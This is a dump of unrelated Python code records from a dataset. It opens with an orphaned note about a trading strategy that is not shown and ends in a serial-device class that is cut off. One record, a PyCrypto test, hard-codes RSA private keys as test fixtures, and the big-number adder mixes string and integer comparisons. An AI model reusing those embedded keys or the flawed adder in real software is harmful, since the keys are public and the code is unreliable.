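The strategy above is a Dual Thrust variant: each entry line sits at the interval's start price plus `k` times a lookback range, with the bear range kept negative so both entries are additions. A standalone sketch of the entry-line arithmetic with made-up numbers (the record's `cfgKBull`/`cfgKBear` correspond to the `k_*` parameters):

```python
def dual_thrust_entries(highs, lows, closes, start_price,
                        k_bull=0.5, k_bear=0.5):
    bull_range = max(highs) - min(closes)   # HH - LC, positive
    bear_range = min(lows) - max(closes)    # LL - HC, negative, as above
    bull_entry = start_price + k_bull * bull_range   # go long above this
    bear_entry = start_price + k_bear * bear_range   # go short below this
    return bull_entry, bear_entry


# made-up lookback highs/lows/closes and interval start price
print(dual_thrust_entries([105, 108], [99, 101], [103, 106], 104.0))
# (106.5, 100.5)
```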
+{"seq_id":"362676097","text":"from div import modulo\nfrom sub import sub\n\ndef add(a, b):\n\tif a < 0 and b < 0:\n\t\ta, b = -a, -b\n\telif a < 0:\n\t\treturn sub(b, -a)\n\telif b < 0:\n\t\treturn sub(a, -b)\n\tif len(a) < len(b):\n\t\ta, b = b, a\n\ti = len(b) - 1\n\tj = len(a) - 1\n\tcarry = 0\n\tres = ''\n\twhile i >= 0:\n\t\t# k is the result digit for this column; the carry propagates leftwards\n\t\tk = (int(a[j]) + int(b[i]) + carry) % 10\n\t\tcarry = (int(a[j]) + int(b[i]) + carry) // 10\n\t\tres = str(k) + res\n\t\ti -= 1\n\t\tj -= 1\n\twhile j >= 0:\n\t\tk = (int(a[j]) + carry) % 10\n\t\tcarry = (int(a[j]) + carry) // 10\n\t\tres = str(k) + res\n\t\tj -= 1\n\tif carry != 0:\n\t\tres = str(carry) + res\n\treturn res\n\ndef add_modulo(a, b, m):\n\treturn modulo(int(add(a,b)), m)","sub_path":"add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
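# Worked example of the column addition above, add('987', '14'):
#   7+4     = 11 -> digit 1, carry 1
#   8+1+1   = 10 -> digit 0, carry 1
#   9+carry = 10 -> digit 0, carry 1, prepended as the leading '1'
# so add('987', '14') returns '1001'.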
+{"seq_id":"10276257","text":"from __future__ import absolute_import\nfrom pycounter import report\nimport unittest\nimport datetime\n\n\nclass TestNextMonth(unittest.TestCase):\n def test_nextmonth(self):\n data = [((2000, 1, 1), (2000, 2, 1)),\n ((2000, 12, 1), (2001, 1, 1)),\n ((2000, 2, 29), (2000, 3, 1)),\n ((1999, 12, 6), (2000, 1, 1)),\n ]\n for pair in data:\n self.assertEqual(datetime.date(*pair[1]),\n report._next_month(datetime.date(*pair[0]))\n )\n","sub_path":"pycounter/test/test_helpers.py","file_name":"test_helpers.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
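# A minimal sketch (an assumption -- not pycounter's actual implementation)
# of the behavior report._next_month is expected to have, per the test data
# above: snap to the first day of the following month, rolling December over
# into January of the next year.
import datetime

def next_month_sketch(d):
    if d.month == 12:
        return datetime.date(d.year + 1, 1, 1)
    return datetime.date(d.year, d.month + 1, 1)

assert next_month_sketch(datetime.date(2000, 2, 29)) == datetime.date(2000, 3, 1)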
+{"seq_id":"133325378","text":"# ############################################################################ #\n# #\n# ::: :::::::: #\n# clang_format.py :+: :+: :+: #\n# +:+ +:+ +:+ #\n# By: cacharle +#+ +:+ +#+ #\n# +#+#+#+#+#+ +#+ #\n# Created: 2020/10/04 10:40:07 by cacharle #+# #+# #\n# Updated: 2021/10/10 22:24:42 by tayamamo ### ########.fr #\n# #\n# ############################################################################ #\n\nimport inspect\nimport os\nimport subprocess\nimport sys\nfrom contextlib import contextmanager\n\nimport c_formatter_42.data\n\nCONFIG_FILENAME = \".clang-format\"\n\nDATA_DIR = os.path.dirname(inspect.getfile(c_formatter_42.data))\n\n\n@contextmanager\ndef _config_context():\n    \"\"\" Temporarily place the .clang-format config file in the current directory\n    If there already is a config in the current directory, it's backed up,\n    then put back in place after clang-format is done running\n    \"\"\"\n    config_path = os.path.join(DATA_DIR, CONFIG_FILENAME)\n    previous_config = None\n    try:\n        os.symlink(config_path, CONFIG_FILENAME)\n    except FileExistsError:\n        if not os.path.islink(CONFIG_FILENAME):\n            with open(CONFIG_FILENAME) as f:\n                previous_config = f.read()\n        os.unlink(CONFIG_FILENAME)\n        os.symlink(config_path, CONFIG_FILENAME)\n    try:\n        yield\n    finally:\n        os.unlink(CONFIG_FILENAME)\n        if previous_config is not None:\n            with open(CONFIG_FILENAME, \"w\") as f:\n                f.write(previous_config)\n\n\nif sys.platform == \"linux\":\n    CLANG_FORMAT_EXEC = os.path.join(DATA_DIR, \"clang-format-linux\")\nelif sys.platform == \"darwin\":\n    CLANG_FORMAT_EXEC = os.path.join(DATA_DIR, \"clang-format-darwin\")\nelse:\n    raise NotImplementedError(\"Your platform is not supported\")\n\n\ndef clang_format(content: str) -> str:\n    \"\"\" Wrapper around clang-format\n\n    Pass content on stdin and return stdout.\n    The clang-format executable is selected according to the platform;\n    this is to keep the same version of clang-format across all setups.\n    \"\"\"\n    with _config_context():\n        process = subprocess.Popen(\n            [CLANG_FORMAT_EXEC, \"-style=file\"],\n            stdin=subprocess.PIPE,\n            stdout=subprocess.PIPE,\n            stderr=subprocess.PIPE,\n        )\n        out, err = process.communicate(input=content.encode())\n        if process.returncode != 0:\n            raise RuntimeError(f\"clang-format error: {err.decode()}\")\n        return out.decode()\n","sub_path":"c_formatter_42/formatters/clang_format.py","file_name":"clang_format.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
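# Hypothetical usage of the wrapper above (assumes the bundled clang-format
# binary for your platform is present in DATA_DIR):
#
#     from c_formatter_42.formatters.clang_format import clang_format
#     print(clang_format("int main(){return (0);}\n"))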
+{"seq_id":"622132213","text":"import json\nfrom urllib import urlopen\nfrom bottle import *\nimport model\n\nbottle = Bottle()\n\n@bottle.route(\"/save\")\ndef save():\n    data = json.loads(urlopen(\"http://opendata2.epa.gov.tw/AQX.json\").read())\n    # get max PublishTime in the data\n    publishtime = max([x[\"PublishTime\"] for x in data])\n    # yield max(data, key=lambda x:x[\"PublishTime\"])\n\n    out = {\"PublishTime\":publishtime}\n    tmp = []\n    for obj in data:\n        tmp += [{\"County\":obj.get(\"County\"),\n                 \"SiteName\":obj.get(\"SiteName\"),\n                 \"PM25\":obj.get(\"PM2.5\"),\n                 \"PSI\":obj.get(\"PSI\")}]\n    out.update({\"data\":tmp})\n\n    result = model.Airquality.gql(\"WHERE publishtime = :1\", publishtime)\n\n    if result.count() == 0:\n        air = model.Airquality()\n        air.publishtime = publishtime\n        air.data = json.dumps(out)\n        air.put()\n\n    response.content_type = \"application/json\"\n    yield json.dumps(out)\n\n@bottle.route(\"/query/<publishtime>\")\n@view(\"query\")\ndef query(publishtime):\n\n    result = model.Airquality.gql(\"WHERE publishtime = :1\", publishtime)\n    return dict(data=json.loads(result[0].data), time=result[0].publishtime)\n\n@bottle.route(\"/\")\n@bottle.route(\"/datelist\")\ndef datelist():\n    for obj in model.Airquality.all().order(\"-publishtime\"):\n        yield \"\" + obj.publishtime + \"\" + \"
\"\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
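# Bottle's dynamic-route syntax used by the /query/<publishtime> handler
# above: the <name> wildcard is passed to the view function as a keyword
# argument, e.g.:
#
#     @bottle.route("/hello/<who>")
#     def hello(who):
#         return "Hello " + who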
+{"seq_id":"181203194","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\Crypto\\SelfTest\\PublicKey\\test_importKey.py\n# Compiled at: 2013-03-14 04:43:25\nfrom __future__ import nested_scopes\n__revision__ = '$Id$'\nimport unittest\nfrom Crypto.PublicKey import RSA\nfrom Crypto.SelfTest.st_common import *\nfrom Crypto.Util.py3compat import *\nfrom Crypto.Util.number import inverse\nfrom Crypto.Util import asn1\n\ndef der2pem(der, text='PUBLIC'):\n import binascii\n chunks = [ binascii.b2a_base64(der[i:i + 48]) for i in range(0, len(der), 48) ]\n pem = b('-----BEGIN %s KEY-----\\n' % text)\n pem += b('').join(chunks)\n pem += b('-----END %s KEY-----' % text)\n return pem\n\n\nclass ImportKeyTests(unittest.TestCase):\n rsaKeyPEM = '-----BEGIN RSA PRIVATE KEY-----\\nMIIBOwIBAAJBAL8eJ5AKoIsjURpcEoGubZMxLD7+kT+TLr7UkvEtFrRhDDKMtuII\\nq19FrL4pUIMymPMSLBn3hJLe30Dw48GQM4UCAwEAAQJACUSDEp8RTe32ftq8IwG8\\nWojl5mAd1wFiIOrZ/Uv8b963WJOJiuQcVN29vxU5+My9GPZ7RA3hrDBEAoHUDPrI\\nOQIhAPIPLz4dphiD9imAkivY31Rc5AfHJiQRA7XixTcjEkojAiEAyh/pJHks/Mlr\\n+rdPNEpotBjfV4M4BkgGAA/ipcmaAjcCIQCHvhwwKVBLzzTscT2HeUdEeBMoiXXK\\nJACAr3sJQJGxIQIgarRp+m1WSKV1MciwMaTOnbU7wxFs9DP1pva76lYBzgUCIQC9\\nn0CnZCJ6IZYqSt0H5N7+Q+2Ro64nuwV/OSQfM6sBwQ==\\n-----END RSA PRIVATE KEY-----'\n rsaKeyPEM8 = '-----BEGIN PRIVATE KEY-----\\nMIIBVQIBADANBgkqhkiG9w0BAQEFAASCAT8wggE7AgEAAkEAvx4nkAqgiyNRGlwS\\nga5tkzEsPv6RP5MuvtSS8S0WtGEMMoy24girX0WsvilQgzKY8xIsGfeEkt7fQPDj\\nwZAzhQIDAQABAkAJRIMSnxFN7fZ+2rwjAbxaiOXmYB3XAWIg6tn9S/xv3rdYk4mK\\n5BxU3b2/FTn4zL0Y9ntEDeGsMEQCgdQM+sg5AiEA8g8vPh2mGIP2KYCSK9jfVFzk\\nB8cmJBEDteLFNyMSSiMCIQDKH+kkeSz8yWv6t080Smi0GN9XgzgGSAYAD+KlyZoC\\nNwIhAIe+HDApUEvPNOxxPYd5R0R4EyiJdcokAICvewlAkbEhAiBqtGn6bVZIpXUx\\nyLAxpM6dtTvDEWz0M/Wm9rvqVgHOBQIhAL2fQKdkInohlipK3Qfk3v5D7ZGjrie7\\nBX85JB8zqwHB\\n-----END PRIVATE KEY-----'\n rsaKeyEncryptedPEM = (\n ('test', '-----BEGIN RSA PRIVATE KEY-----\\nProc-Type: 4,ENCRYPTED\\nDEK-Info: DES-CBC,AF8F9A40BD2FA2FC\\n\\nCkl9ex1kaVEWhYC2QBmfaF+YPiR4NFkRXA7nj3dcnuFEzBnY5XULupqQpQI3qbfA\\nu8GYS7+b3toWWiHZivHbAAUBPDIZG9hKDyB9Sq2VMARGsX1yW1zhNvZLIiVJzUHs\\nC6NxQ1IJWOXzTew/xM2I26kPwHIvadq+/VaT8gLQdjdH0jOiVNaevjWnLgrn1mLP\\nBCNRMdcexozWtAFNNqSzfW58MJL2OdMi21ED184EFytIc1BlB+FZiGZduwKGuaKy\\n9bMbdb/1PSvsSzPsqW7KSSrTw6MgJAFJg6lzIYvR5F4poTVBxwBX3+EyEmShiaNY\\nIRX3TgQI0IjrVuLmvlZKbGWP18FXj7I7k9tSsNOOzllTTdq3ny5vgM3A+ynfAaxp\\ndysKznQ6P+IoqML1WxAID4aGRMWka+uArOJ148Rbj9s=\\n-----END RSA PRIVATE KEY-----',\n b'\\xaf\\x8f\\x9a@\\xbd/\\xa2\\xfc'),\n ('rocking', '-----BEGIN RSA PRIVATE KEY-----\\nProc-Type: 4,ENCRYPTED\\nDEK-Info: DES-EDE3-CBC,C05D6C07F7FC02F6\\n\\nw4lwQrXaVoTTJ0GgwY566htTA2/t1YlimhxkxYt9AEeCcidS5M0Wq9ClPiPz9O7F\\nm6K5QpM1rxo1RUE/ZyI85gglRNPdNwkeTOqit+kum7nN73AToX17+irVmOA4Z9E+\\n4O07t91GxGMcjUSIFk0ucwEU4jgxRvYscbvOMvNbuZszGdVNzBTVddnShKCsy9i7\\nnJbPlXeEKYi/OkRgO4PtfqqWQu5GIEFVUf9ev1QV7AvC+kyWTR1wWYnHX265jU5c\\nsopxQQtP8XEHIJEdd5/p1oieRcWTCNyY8EkslxDSsrf0OtZp6mZH9N+KU47cgQtt\\n9qGORmlWnsIoFFKcDohbtOaWBTKhkj5h6OkLjFjfU/sBeV1c+7wDT3dAy5tawXjG\\nYSxC7qDQIT/RECvV3+oQKEcmpEujn45wAnkTi12BH30=\\n-----END RSA PRIVATE KEY-----',\n b'\\xc0]l\\x07\\xf7\\xfc\\x02\\xf6'))\n rsaPublicKeyPEM = '-----BEGIN PUBLIC KEY-----\\nMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAL8eJ5AKoIsjURpcEoGubZMxLD7+kT+T\\nLr7UkvEtFrRhDDKMtuIIq19FrL4pUIMymPMSLBn3hJLe30Dw48GQM4UCAwEAAQ==\\n-----END PUBLIC KEY-----'\n rsaPublicKeyOpenSSH = b('ssh-rsa 
AAAAB3NzaC1yc2EAAAADAQABAAAAQQC/HieQCqCLI1EaXBKBrm2TMSw+/pE/ky6+1JLxLRa0YQwyjLbiCKtfRay+KVCDMpjzEiwZ94SS3t9A8OPBkDOF comment\\n')\n rsaKeyDER = a2b_hex(('3082013b020100024100bf1e27900aa08b23511a5c1281ae6d93312c3efe\\n 913f932ebed492f12d16b4610c328cb6e208ab5f45acbe2950833298f312\\n 2c19f78492dedf40f0e3c190338502030100010240094483129f114dedf6\\n 7edabc2301bc5a88e5e6601dd7016220ead9fd4bfc6fdeb75893898ae41c\\n 54ddbdbf1539f8ccbd18f67b440de1ac30440281d40cfac839022100f20f\\n 2f3e1da61883f62980922bd8df545ce407c726241103b5e2c53723124a23\\n 022100ca1fe924792cfcc96bfab74f344a68b418df578338064806000fe2\\n a5c99a023702210087be1c3029504bcf34ec713d877947447813288975ca\\n 240080af7b094091b12102206ab469fa6d5648a57531c8b031a4ce9db53b\\n c3116cf433f5a6f6bbea5601ce05022100bd9f40a764227a21962a4add07\\n e4defe43ed91a3ae27bb057f39241f33ab01c1\\n ').replace(' ', ''))\n rsaKeyDER8 = a2b_hex(('30820155020100300d06092a864886f70d01010105000482013f3082013\\n b020100024100bf1e27900aa08b23511a5c1281ae6d93312c3efe913f932\\n ebed492f12d16b4610c328cb6e208ab5f45acbe2950833298f3122c19f78\\n 492dedf40f0e3c190338502030100010240094483129f114dedf67edabc2\\n 301bc5a88e5e6601dd7016220ead9fd4bfc6fdeb75893898ae41c54ddbdb\\n f1539f8ccbd18f67b440de1ac30440281d40cfac839022100f20f2f3e1da\\n 61883f62980922bd8df545ce407c726241103b5e2c53723124a23022100c\\n a1fe924792cfcc96bfab74f344a68b418df578338064806000fe2a5c99a0\\n 23702210087be1c3029504bcf34ec713d877947447813288975ca240080a\\n f7b094091b12102206ab469fa6d5648a57531c8b031a4ce9db53bc3116cf\\n 433f5a6f6bbea5601ce05022100bd9f40a764227a21962a4add07e4defe4\\n 3ed91a3ae27bb057f39241f33ab01c1\\n ').replace(' ', ''))\n rsaPublicKeyDER = a2b_hex(('305c300d06092a864886f70d0101010500034b003048024100bf1e27900a\\n a08b23511a5c1281ae6d93312c3efe913f932ebed492f12d16b4610c328c\\n b6e208ab5f45acbe2950833298f3122c19f78492dedf40f0e3c190338502\\n 03010001\\n ').replace(' ', ''))\n n = long(('BF 1E 27 90 0A A0 8B 23 51 1A 5C 12 81 AE 6D 93 31 2C 3E FE 91 3F 93 2E BE D4 92 F1 2D 16 B4 61 0C 32 8C B6 E2 08 AB 5F 45 AC BE 29 50 83 32 98 F3 12 2C 19 F7 84 92 DE DF 40 F0 E3 C1 90 33 85').replace(' ', ''), 16)\n e = 65537\n d = long(('09 44 83 12 9F 11 4D ED F6 7E DA BC 23 01 BC 5A 88 E5 E6 60 1D D7 01 62 20 EA D9 FD 4B FC 6F DE B7 58 93 89 8A E4 1C 54 DD BD BF 15 39 F8 CC BD 18 F6 7B 44 0D E1 AC 30 44 02 81 D4 0C FA C8 39').replace(' ', ''), 16)\n p = long(('00 F2 0F 2F 3E 1D A6 18 83 F6 29 80 92 2B D8 DF 54 5C E4 07 C7 26 24 11 03 B5 E2 C5 37 23 12 4A 23').replace(' ', ''), 16)\n q = long(('00 CA 1F E9 24 79 2C FC C9 6B FA B7 4F 34 4A 68 B4 18 DF 57 83 38 06 48 06 00 0F E2 A5 C9 9A 02 37').replace(' ', ''), 16)\n qInv = long(('00 BD 9F 40 A7 64 22 7A 21 96 2A 4A DD 07 E4 DE FE 43 ED 91 A3 AE 27 BB 05 7F 39 24 1F 33 AB 01 C1').replace(' ', ''), 16)\n pInv = inverse(p, q)\n\n def testImportKey1(self):\n \"\"\"Verify import of RSAPrivateKey DER SEQUENCE\"\"\"\n key = self.rsa.importKey(self.rsaKeyDER)\n self.failUnless(key.has_private())\n self.assertEqual(key.n, self.n)\n self.assertEqual(key.e, self.e)\n self.assertEqual(key.d, self.d)\n self.assertEqual(key.p, self.p)\n self.assertEqual(key.q, self.q)\n\n def testImportKey2(self):\n \"\"\"Verify import of SubjectPublicKeyInfo DER SEQUENCE\"\"\"\n key = self.rsa.importKey(self.rsaPublicKeyDER)\n self.failIf(key.has_private())\n self.assertEqual(key.n, self.n)\n self.assertEqual(key.e, self.e)\n\n def testImportKey3unicode(self):\n \"\"\"Verify import of RSAPrivateKey DER SEQUENCE, encoded with PEM as unicode\"\"\"\n key = RSA.importKey(self.rsaKeyPEM)\n 
self.assertEqual(key.has_private(), True)\n self.assertEqual(key.n, self.n)\n self.assertEqual(key.e, self.e)\n self.assertEqual(key.d, self.d)\n self.assertEqual(key.p, self.p)\n self.assertEqual(key.q, self.q)\n\n def testImportKey3bytes(self):\n \"\"\"Verify import of RSAPrivateKey DER SEQUENCE, encoded with PEM as byte string\"\"\"\n key = RSA.importKey(b(self.rsaKeyPEM))\n self.assertEqual(key.has_private(), True)\n self.assertEqual(key.n, self.n)\n self.assertEqual(key.e, self.e)\n self.assertEqual(key.d, self.d)\n self.assertEqual(key.p, self.p)\n self.assertEqual(key.q, self.q)\n\n def testImportKey4unicode(self):\n \"\"\"Verify import of RSAPrivateKey DER SEQUENCE, encoded with PEM as unicode\"\"\"\n key = RSA.importKey(self.rsaPublicKeyPEM)\n self.assertEqual(key.has_private(), False)\n self.assertEqual(key.n, self.n)\n self.assertEqual(key.e, self.e)\n\n def testImportKey4bytes(self):\n \"\"\"Verify import of SubjectPublicKeyInfo DER SEQUENCE, encoded with PEM as byte string\"\"\"\n key = RSA.importKey(b(self.rsaPublicKeyPEM))\n self.assertEqual(key.has_private(), False)\n self.assertEqual(key.n, self.n)\n self.assertEqual(key.e, self.e)\n\n def testImportKey5(self):\n \"\"\"Verifies that the imported key is still a valid RSA pair\"\"\"\n key = RSA.importKey(self.rsaKeyPEM)\n idem = key.encrypt(key.decrypt(b('Test')), 0)\n self.assertEqual(idem[0], b('Test'))\n\n def testImportKey6(self):\n \"\"\"Verifies that the imported key is still a valid RSA pair\"\"\"\n key = RSA.importKey(self.rsaKeyDER)\n idem = key.encrypt(key.decrypt(b('Test')), 0)\n self.assertEqual(idem[0], b('Test'))\n\n def testImportKey7(self):\n \"\"\"Verify import of OpenSSH public key\"\"\"\n key = self.rsa.importKey(self.rsaPublicKeyOpenSSH)\n self.assertEqual(key.n, self.n)\n self.assertEqual(key.e, self.e)\n\n def testImportKey8(self):\n \"\"\"Verify import of encrypted PrivateKeyInfo DER SEQUENCE\"\"\"\n for t in self.rsaKeyEncryptedPEM:\n key = self.rsa.importKey(t[1], t[0])\n self.failUnless(key.has_private())\n self.assertEqual(key.n, self.n)\n self.assertEqual(key.e, self.e)\n self.assertEqual(key.d, self.d)\n self.assertEqual(key.p, self.p)\n self.assertEqual(key.q, self.q)\n\n def testImportKey9(self):\n \"\"\"Verify import of unencrypted PrivateKeyInfo DER SEQUENCE\"\"\"\n key = self.rsa.importKey(self.rsaKeyDER8)\n self.failUnless(key.has_private())\n self.assertEqual(key.n, self.n)\n self.assertEqual(key.e, self.e)\n self.assertEqual(key.d, self.d)\n self.assertEqual(key.p, self.p)\n self.assertEqual(key.q, self.q)\n\n def testImportKey10(self):\n \"\"\"Verify import of unencrypted PrivateKeyInfo DER SEQUENCE, encoded with PEM\"\"\"\n key = self.rsa.importKey(self.rsaKeyPEM8)\n self.failUnless(key.has_private())\n self.assertEqual(key.n, self.n)\n self.assertEqual(key.e, self.e)\n self.assertEqual(key.d, self.d)\n self.assertEqual(key.p, self.p)\n self.assertEqual(key.q, self.q)\n\n def testImportKey11(self):\n \"\"\"Verify import of RSAPublicKey DER SEQUENCE\"\"\"\n der = asn1.DerSequence([17, 3]).encode()\n key = self.rsa.importKey(der)\n self.assertEqual(key.n, 17)\n self.assertEqual(key.e, 3)\n\n def testImportKey12(self):\n \"\"\"Verify import of RSAPublicKey DER SEQUENCE, encoded with PEM\"\"\"\n der = asn1.DerSequence([17, 3]).encode()\n pem = der2pem(der)\n key = self.rsa.importKey(pem)\n self.assertEqual(key.n, 17)\n self.assertEqual(key.e, 3)\n\n def testExportKey1(self):\n key = self.rsa.construct([self.n, self.e, self.d, self.p, self.q, self.pInv])\n derKey = key.exportKey('DER')\n 
self.assertEqual(derKey, self.rsaKeyDER)\n\n def testExportKey2(self):\n key = self.rsa.construct([self.n, self.e])\n derKey = key.exportKey('DER')\n self.assertEqual(derKey, self.rsaPublicKeyDER)\n\n def testExportKey3(self):\n key = self.rsa.construct([self.n, self.e, self.d, self.p, self.q, self.pInv])\n pemKey = key.exportKey('PEM')\n self.assertEqual(pemKey, b(self.rsaKeyPEM))\n\n def testExportKey4(self):\n key = self.rsa.construct([self.n, self.e])\n pemKey = key.exportKey('PEM')\n self.assertEqual(pemKey, b(self.rsaPublicKeyPEM))\n\n def testExportKey5(self):\n key = self.rsa.construct([self.n, self.e])\n openssh_1 = key.exportKey('OpenSSH').split()\n openssh_2 = self.rsaPublicKeyOpenSSH.split()\n self.assertEqual(openssh_1[0], openssh_2[0])\n self.assertEqual(openssh_1[1], openssh_2[1])\n\n def testExportKey6(self):\n key = self.rsa.construct([self.n, self.e, self.d, self.p, self.q, self.pInv])\n t = map(b, self.rsaKeyEncryptedPEM[1])\n key._randfunc = lambda N: (t[2] * divmod(N + len(t[2]), len(t[2]))[0])[:N]\n pemKey = key.exportKey('PEM', t[0])\n self.assertEqual(pemKey, t[1])\n\n def testExportKey7(self):\n key = self.rsa.construct([self.n, self.e, self.d, self.p, self.q, self.pInv])\n derKey = key.exportKey('DER', pkcs=8)\n self.assertEqual(derKey, self.rsaKeyDER8)\n\n def testExportKey8(self):\n key = self.rsa.construct([self.n, self.e, self.d, self.p, self.q, self.pInv])\n pemKey = key.exportKey('PEM', pkcs=8)\n self.assertEqual(pemKey, b(self.rsaKeyPEM8))\n\n def testExportKey9(self):\n key = self.rsa.construct([self.n, self.e, self.d, self.p, self.q, self.pInv])\n self.assertRaises(ValueError, key.exportKey, 'invalid-format')\n\n\nclass ImportKeyTestsSlow(ImportKeyTests):\n\n def setUp(self):\n self.rsa = RSA.RSAImplementation(use_fast_math=0)\n\n\nclass ImportKeyTestsFast(ImportKeyTests):\n\n def setUp(self):\n self.rsa = RSA.RSAImplementation(use_fast_math=1)\n\n\nif __name__ == '__main__':\n unittest.main()\n\ndef get_tests(config={}):\n tests = []\n try:\n from Crypto.PublicKey import _fastmath\n tests += list_test_cases(ImportKeyTestsFast)\n except ImportError:\n pass\n\n tests += list_test_cases(ImportKeyTestsSlow)\n return tests\n\n\nif __name__ == '__main__':\n suite = lambda : unittest.TestSuite(get_tests())\n unittest.main(defaultTest='suite')","sub_path":"pycfiles/dlitztest-2.6-py2.7-win32/test_importKey.py","file_name":"test_importKey.py","file_ext":"py","file_size_in_byte":13601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
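# der2pem() above implements the standard PEM framing: base64-encode the DER
# bytes in 48-byte chunks (64 base64 characters per line) between BEGIN/END
# markers, producing output shaped like the rsaPublicKeyPEM fixture, e.g.:
#
#     -----BEGIN PUBLIC KEY-----
#     MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAL8eJ5AKoIsjURpcEoGubZMxLD7+kT+T
#     ...
#     -----END PUBLIC KEY-----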
+{"seq_id":"316058893","text":"import imageio\nimport torch\n\n'''\nIn medical imagery you have an extra dimension, depth, after the\nchannel dimension, leading to a 5D tensor of shape N x C x D x H x W\n'''\n\ndir_path = \"xyz\" # path to directory of medical images\nvol_arr = imageio.volread(dir_path, 'DICOM') # volread is the imageio function for reading volumetric images\n# print(vol_arr.shape)\n\n# make room for the channel dimension\nvol = torch.from_numpy(vol_arr).float()\nvol = torch.transpose(vol, 0, 2)\nvol = torch.unsqueeze(vol, 0)\n# unsqueeze is the opposite of squeeze: squeeze removes a size-1 axis, unsqueeze adds an axis at the given dimension\n# view/squeeze/resize/unsqueeze are easy to confuse\n\nprint(vol.shape)\n","sub_path":"pytorch_learning/pt_006realdata_voxels.py","file_name":"pt_006realdata_voxels.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
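# Quick shape demo of the squeeze/unsqueeze distinction noted above:
import torch

t = torch.zeros(3, 4)
print(t.unsqueeze(0).shape)             # torch.Size([1, 3, 4]) - axis added at dim 0
print(t.unsqueeze(0).squeeze(0).shape)  # torch.Size([3, 4])    - size-1 axis removed
print(t.view(4, 3).shape)               # torch.Size([4, 3])    - same data, new shape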
+{"seq_id":"180073010","text":"\"\"\"\nHangman.\n\nAuthors: Tyler Thenell and Zachary Zdanavicius.\n\"\"\" # DONE: 1. PUT YOUR NAME IN THE ABOVE LINE.\n\n# DONE: 2. Implement Hangman using your Iterative Enhancement Plan.\nimport random\n####### Do NOT attempt this assignment before class! #######\n\n\ndef main():\n    print('_________________________________')\n    print('| -HANGMAN- |')\n    print('| Tyler & Zach |')\n    print('|________________________________|')\n    min_length = int(input('Give a minimum length: '))\n    num_guesses = int(input('How many chances do you want: '))\n    secret_word = word_selector(min_length)\n    guessing_runner(secret_word, num_guesses)\n\n\ndef word_selector(minimum):\n    with open('words.txt') as f:\n        f.readline()\n        string = f.read()\n    word = string.split()\n    # keep drawing random words until one is long enough; re-drawing inside\n    # the loop avoids an infinite loop when the first pick is too short\n    while True:\n        item = word[random.randrange(0, len(word))]\n        if len(item) >= minimum:\n            return item\n\n\ndef print_known(secret_word, guessed):\n    print()\n    for k in range(len(secret_word)):\n        if secret_word[k] in guessed:\n            print(secret_word[k], end='')\n        else:\n            print('_ ', end='')\n\n\ndef guessing_runner(secret_word, num_guesses):\n    guessed = ''\n    num_guessed = 0\n    while num_guessed < num_guesses:\n        print_known(secret_word, guessed)\n        print()\n        print('You have', num_guesses - num_guessed, 'tries left!')\n        print('And have guessed: ', guessed)\n        new_guess = input('Enter your new guess: ')\n        if len(new_guess) == 1:\n            guessed += new_guess\n\n        for k in range(len(secret_word)):\n            if secret_word[k] == new_guess:\n                num_guessed -= 1\n                break\n\n        num_guessed += 1\n        if win_check(secret_word, guessed) == True:\n            results(True, secret_word)\n            return\n\n    results(False, secret_word)\n\n\ndef win_check(secret_word, guessed):\n    checker = ''\n    for k in range(len(secret_word)):\n        for j in range(len(guessed)):\n            if secret_word[k] == guessed[j]:\n                checker += guessed[j]\n                break\n    if secret_word == checker:\n        return True\n    return False\n\n\ndef results(result, secret_word):\n    for k in range(10):\n        print()\n    print(' __________________')\n    if result == True:\n        print('| YOU WIN! |')\n    if result == False:\n        print('| YOU LOSE |')\n    print('|__________________|')\n    print('The word was: ', secret_word)\n\nmain()\n","sub_path":"src/m1_hangman.py","file_name":"m1_hangman.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"167154263","text":"import time\nimport logging\nimport gevent\nfrom rhizo import util\n\n\n# The Device class handles communication with hardware devices connected via a serial port.\nclass Device(object):\n\n    # initialize the device object given a device ID (a short string) and controller used to communicate with the device;\n    # device IDs should be unique within one serial port connection, but need not be unique across serial ports\n    def __init__(self, device_id, controller, port_name = None):\n        self._device_id = device_id\n        self._controller = controller\n        self._port_name = port_name\n        self._last_ack = ''\n        self._enable_polling = False\n        self._polling_interval = 0.2 # default polling interval in seconds\n        self._last_poll_time = None # last poll time (from time.time())\n\n    # device creation method\n    @classmethod\n    def create(cls, device_id, controller, port_name = None):\n        device = cls(device_id, controller, port_name)\n        controller.serial.add_device(device)\n        return device\n\n    # get the device's serial port name\n    def port_name(self):\n        return self._port_name\n\n    # get the device's ID\n    def device_id(self):\n        return self._device_id\n\n    # set whether this device should be polled in the main polling loop\n    def enable_polling(self, enabled, interval=None):\n        self._enable_polling = enabled\n        if interval:\n            self._polling_interval = interval \n\n    # turn on/off checksum verification on the device\n    def enable_checksum(self, enable):\n        if enable:\n            self.send_command('checksum 1')\n        else:\n            self.send_command('checksum 0')\n\n    # process a serial message received from the device\n    # fix(clean): remove message?\n    def process_serial_message(self, command, args, message):\n        used = True\n        if (command == 'ack' or command == 'ack:'):\n            self._last_ack = message[4:].strip()\n        elif (command == 'log' or command == 'log:') and len(args) > 0:\n            self._controller.update_sequence('log', self._device_id + ': ' + message[4:].strip())\n        elif command == 'updateSequence' and len(args) > 1:\n            sequence_name = args[0]\n            value = ' '.join(args[1:])\n            value = util.convert_value(value)\n            self._controller.update_sequence(sequence_name, value)\n        else:\n            used = False\n        return used\n\n    # send a command to the device; waits for 